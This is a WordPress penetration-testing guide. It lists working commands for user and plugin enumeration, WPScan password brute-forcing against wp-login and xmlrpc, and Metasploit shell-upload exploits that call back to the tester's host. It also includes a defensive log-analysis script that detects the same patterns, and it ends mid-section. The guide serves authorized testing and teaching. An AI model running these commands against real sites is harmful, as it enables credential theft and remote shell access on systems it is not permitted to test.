WordPress Penetration Testing
Purpose
Conduct comprehensive security assessments of WordPress installations including enumeration of users, themes, and plugins, vulnerability scanning, credential attacks, and exploitation techniques. WordPress powers approximately 35% of websites, making it a critical target for security testing.
Prerequisites
Required Tools
- WPScan (pre-installed in Kali Linux)
- Metasploit Framework
- Burp Suite or OWASP ZAP
- Nmap for initial discovery
- cURL or wget
Required Knowledge
- WordPress architecture and structure
- Web application testing fundamentals
- HTTP protocol understanding
- Common web vulnerabilities (OWASP Top 10)
Outputs and Deliverables
- WordPress Enumeration Report - Version, themes, plugins, users
- Vulnerability Assessment - Identified CVEs and misconfigurations
- Credential Assessment - Weak password findings
- Exploitation Proof - Shell access documentation
Core Workflow
Phase 1: WordPress Discovery
Identify WordPress installations:
curl -s http://target.com | grep -i wordpress
curl -s http://target.com | grep -i "wp-content"
curl -s http://target.com | grep -i "wp-includes"
curl -I http://target.com/wp-login.php
curl -I http://target.com/wp-admin/
curl -I http://target.com/wp-content/
curl -I http://target.com/xmlrpc.php
curl -s http://target.com | grep "generator"
nmap -p 80,443 --script http-wordpress-enum target.com
Key WordPress files and directories:
- /wp-admin/ - Admin dashboard
- /wp-login.php - Login page
- /wp-content/ - Themes, plugins, uploads
- /wp-includes/ - Core files
- /xmlrpc.php - XML-RPC interface
- /wp-config.php - Configuration (not accessible if secure)
- /readme.html - Version information
Phase 2: Basic WPScan Enumeration
Comprehensive WordPress scanning with WPScan:
wpscan --url http://target.com/wordpress/
wpscan --url http://target.com --api-token YOUR_API_TOKEN
wpscan --url http://target.com --detection-mode aggressive
wpscan --url http://target.com -o results.txt
wpscan --url http://target.com -f json -o results.json
wpscan --url http://target.com -v
Phase 3: WordPress Version Detection
Identify WordPress version:
wpscan --url http://target.com
curl -s http://target.com/readme.html | grep -i version
curl -s http://target.com/feed/ | grep -i generator
curl -s http://target.com | grep "?ver="
curl -s http://target.com | grep 'name="generator"'
curl -s http://target.com/feed/
curl -s http://target.com/comments/feed/
Version sources:
- Meta generator tag in HTML
- readme.html file
- RSS/Atom feeds
- JavaScript/CSS file versions
Phase 4: Theme Enumeration
Identify installed themes:
wpscan --url http://target.com -e at
wpscan --url http://target.com -e vt
wpscan --url http://target.com -e at --detection-mode aggressive
curl -s http://target.com | grep "wp-content/themes/"
curl -s http://target.com/wp-content/themes/
Theme vulnerability checks:
searchsploit wordpress theme <theme_name>
curl -s http://target.com/wp-content/themes/<theme>/style.css | grep -i version
curl -s http://target.com/wp-content/themes/<theme>/readme.txt
Phase 5: Plugin Enumeration
Identify installed plugins:
wpscan --url http://target.com -e ap
wpscan --url http://target.com -e vp
wpscan --url http://target.com -e ap --plugins-detection aggressive
wpscan --url http://target.com -e ap --plugins-detection mixed
curl -s http://target.com | grep "wp-content/plugins/"
curl -s http://target.com/wp-content/plugins/
Common vulnerable plugins to check:
searchsploit wordpress plugin <plugin_name>
searchsploit wordpress mail-masta
searchsploit wordpress slideshow gallery
searchsploit wordpress reflex gallery
curl -s http://target.com/wp-content/plugins/<plugin>/readme.txt
Phase 6: User Enumeration
Discover WordPress users:
wpscan --url http://target.com -e u
wpscan --url http://target.com -e u1-100
for i in {1..20}; do
    curl -s -I "http://target.com/?author=$i" | grep -i '^location:'
done
curl -s http://target.com/wp-json/wp/v2/users
curl -s http://target.com/wp-json/wp/v2/users?per_page=100
curl -X POST -d "log=admin&pwd=wrongpass" http://target.com/wp-login.php
Phase 7: Comprehensive Enumeration
Run all enumeration modules:
wpscan --url http://target.com -e at -e ap -e u
wpscan --url http://target.com -e vp,vt,u,cb,dbe
wpscan --url http://target.com -e at,ap,u,cb,dbe \
--detection-mode aggressive \
--plugins-detection aggressive
Phase 8: Password Attacks
Brute-force WordPress credentials:
wpscan --url http://target.com -U admin -P /usr/share/wordlists/rockyou.txt
wpscan --url http://target.com -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://target.com -U admin -P passwords.txt --password-attack wp-login -t 50
wpscan --url http://target.com -U admin -P passwords.txt --password-attack xmlrpc
wpscan --url http://target.com -U admin -P passwords.txt --throttle 500
cewl http://target.com -w wordlist.txt
wpscan --url http://target.com -U admin -P wordlist.txt
Password attack methods:
- wp-login - Standard login form
- xmlrpc - XML-RPC method call, one password per request (faster than the form)
- xmlrpc-multicall - Multiple passwords per request
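For the defensive side of the user enumeration (Phase 6) and password attack (Phase 8) techniques above, here is an added example, not from the original page or from WPScan, that runs detection logic over constructed web-server access-log lines and flags the author-id sweep, REST user listing and xmlrpc.php / wp-login.php guessing patterns by source IP. The thresholds, sample IPs and log lines are assumptions.

```python
import re
from collections import Counter, defaultdict

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
AUTHOR_SWEEP = 5   # distinct ?author=N ids from one source (assumed threshold, tune to your site)
POST_BURST = 10    # POSTs to xmlrpc.php or failed wp-login.php POSTs from one source (assumed)

def _line(ip, method, path, status):
    # Constructed sample log line, not from a real server
    return f'{ip} - - [10/Oct/2023:12:00:00 +0000] "{method} {path} HTTP/1.1" {status} 512 "-" "curl/8.0"'

SAMPLE_LOG = "\n".join(
    [_line("203.0.113.5", "GET", f"/?author={i}", 301) for i in range(1, 7)]
    + [_line("203.0.113.5", "GET", "/wp-json/wp/v2/users?per_page=100", 200)]
    + [_line("198.51.100.7", "POST", "/xmlrpc.php", 200) for _ in range(25)]
    + [_line("192.0.2.9", "POST", "/wp-login.php", 302)]  # one successful login, benign
)

def analyze(log_text):
    """Return {source_ip: [findings]} for sources showing the request patterns above."""
    authors = defaultdict(set)
    counts = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.groups()
        url, _, query = path.partition("?")
        if url == "/" and re.fullmatch(r"author=\d+", query):
            authors[ip].add(query)                     # author-archive id sweep
        elif url.startswith("/wp-json/wp/v2/users"):
            counts[ip]["rest_users"] += 1              # REST API user listing
        elif method == "POST" and url == "/xmlrpc.php":
            counts[ip]["xmlrpc"] += 1                  # XML-RPC password guessing
        elif method == "POST" and url == "/wp-login.php" and status == "200":
            counts[ip]["login_fail"] += 1              # failed form login re-renders (200); success redirects (302)
    findings = defaultdict(list)
    for ip, ids in authors.items():
        if len(ids) >= AUTHOR_SWEEP:
            findings[ip].append(f"author-id sweep ({len(ids)} ids)")
    for ip, c in counts.items():
        if c["rest_users"]:
            findings[ip].append("REST user listing")
        for key, label in (("xmlrpc", "xmlrpc.php POSTs"), ("login_fail", "failed wp-login.php POSTs")):
            if c[key] >= POST_BURST:
                findings[ip].append(f"{label}: {c[key]}")
    return dict(findings)
```

Feed real combined-format logs to analyze() and alert on any returned source; the same signals are what the enumeration and brute-force commands above leave behind.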
Phase 9: Vulnerability Exploitation
Metasploit Shell Upload
After obtaining credentials:
msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS target.com
set USERNAME admin
set PASSWORD jessica
set TARGETURI /wordpress
set LHOST <your_ip>
exploit
Plugin Exploitation
use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOSTS target.com
set TARGETURI /wordpress
set USERNAME admin
set PASSWORD jessica
set LHOST <your_ip>
exploit
search type:exploit platform:php wordpress
Manual Exploitation
Theme/plugin editor (with admin access):